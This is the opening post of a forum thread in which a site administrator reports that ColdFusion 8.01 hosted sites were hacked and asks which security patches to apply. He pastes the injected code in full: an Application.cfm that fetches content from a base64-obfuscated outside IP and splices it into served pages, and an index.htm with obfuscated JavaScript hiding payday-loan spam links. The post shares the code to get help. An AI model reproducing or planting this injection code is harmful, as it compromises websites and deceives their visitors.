1 2 Previous Next 39 Replies Latest reply: Sep 22, 2013 3:03 PM by Cenn Raven RSS

    CF8.01 hacked.  Need info on patches

    Jjboswell

      Yesterday some of our hosted sites were hacked using code pasted below.  We're running CF 8.01 and I'm wondering if there is a cumulative secutity patch that we can apply or If I should just apply every security patch that I can find.  I noticed that this particular vulnerability was patched for CF9 and 10 about six weeks ago.

       

      Here's the hack:

       

      1. Application.cfm

      <cfif (FindNoCase("Archivver",http_user_agent) EQ 0)><cfsavecontent variable="paga"><CFHTTP METHOD = "Get" URL = "http://#SERVER_NAME##SCRIPT_NAME#?#QUERY_STRING#" userAgent = "Archivver">

      <cfset mmy = cfhttp.FileContent><cfoutput>

      #mmy#

      </cfoutput>

      </cfsavecontent>

      <CFHTTP METHOD = "Get" URL = "#hSWaawe('aHR0cDovLzE5OS4xOS45NC4xOTQvY2ZzZXQyLnR4dA==')#">

      <cfset cfs = cfhttp.FileContent>

      <cfif (FindNoCase("</div>",paga) GT 0)>

      <cfset paga = replace(paga, "</div>", "</div>#cfs#", "one")>

      <cfelseif (FindNoCase("</table>",paga) GT 0)>

      <cfset paga = replace(paga, "</table>", "</table>#cfs#", "one")>

      <cfelseif (FindNoCase("</a>",paga) GT 0)>

      <cfset paga = replace(paga, "</a>", "</a>#cfs#", "one")>

      <cfelse>

      <cfset paga = replace(paga, "</body>", "#cfs#</body>", "one")>

      </cfif>

      <cfoutput>

      #paga#

      </cfoutput>

      <cfabort>

      </cfif>

      <cffunction name="hSWaawe"> 

      <cfargument name="HxzcGlk">

      <cfset Ypg = ToString(ToBinary(HxzcGlk))>

      <cfreturn Ypg>

      </cffunction>

       

       

      1. Index.htm

       

       

      <html>

        <head>

          <meta HTTP-EQUIV="REFRESH" content="0; url=http://www.thehiltonorlando.com/">

        </head>

        <body>

          <br>

          <br>

          <br>

          <br>

          <center>

            <a href="http://www.thehiltonorlando.com/">This page has moved.  Please click here if you are not automatically redirected in a moment...</a><script language="JavaScript">function zdrViewState()

      {

      var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','99779188 90','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];

      t=z='';

      for(v=0;v<m.length;){t+=m.charAt(v++);

      if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);

      t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}zdrViewState();

      </script>

       

       

       

      <p class="zdroq">

      Most of the time, the borrower would <a href="http://www.paydayloans-online-uk.co.uk/" title="Payday">payday</a> be the one jeopardized. Applying to various payday loan sites could create suspicion to the lender <a href="http://payday-loans-fts.co.uk/" title="Payday Loans">payday loans</a> and this could make the approval process unnecessarily burdening. Having a checking account is also a <a href="http://best-rates-payday-loans.co.uk/" title="Http://best-rates-payday-loans.co.uk/">http://best-rates-payday-loans.co.uk/</a> must. They would also need this in order to withdraw money from your account when the payment is <a href="http://bad-credit-payday.co.uk/" title="Payday Loans Bad Credit">payday loans bad credit</a> due. In the long run, you would see that they have high interest rates that would be equivalent to wasting your <a href="http://payday-loans-eng.co.uk/" title="Payday Loans Uk">payday loans uk</a> money. </p>

          </center>

        </body>

      </html>

       

      Thanks in advance.

       

      --Jeremy

        1 2 Previous Next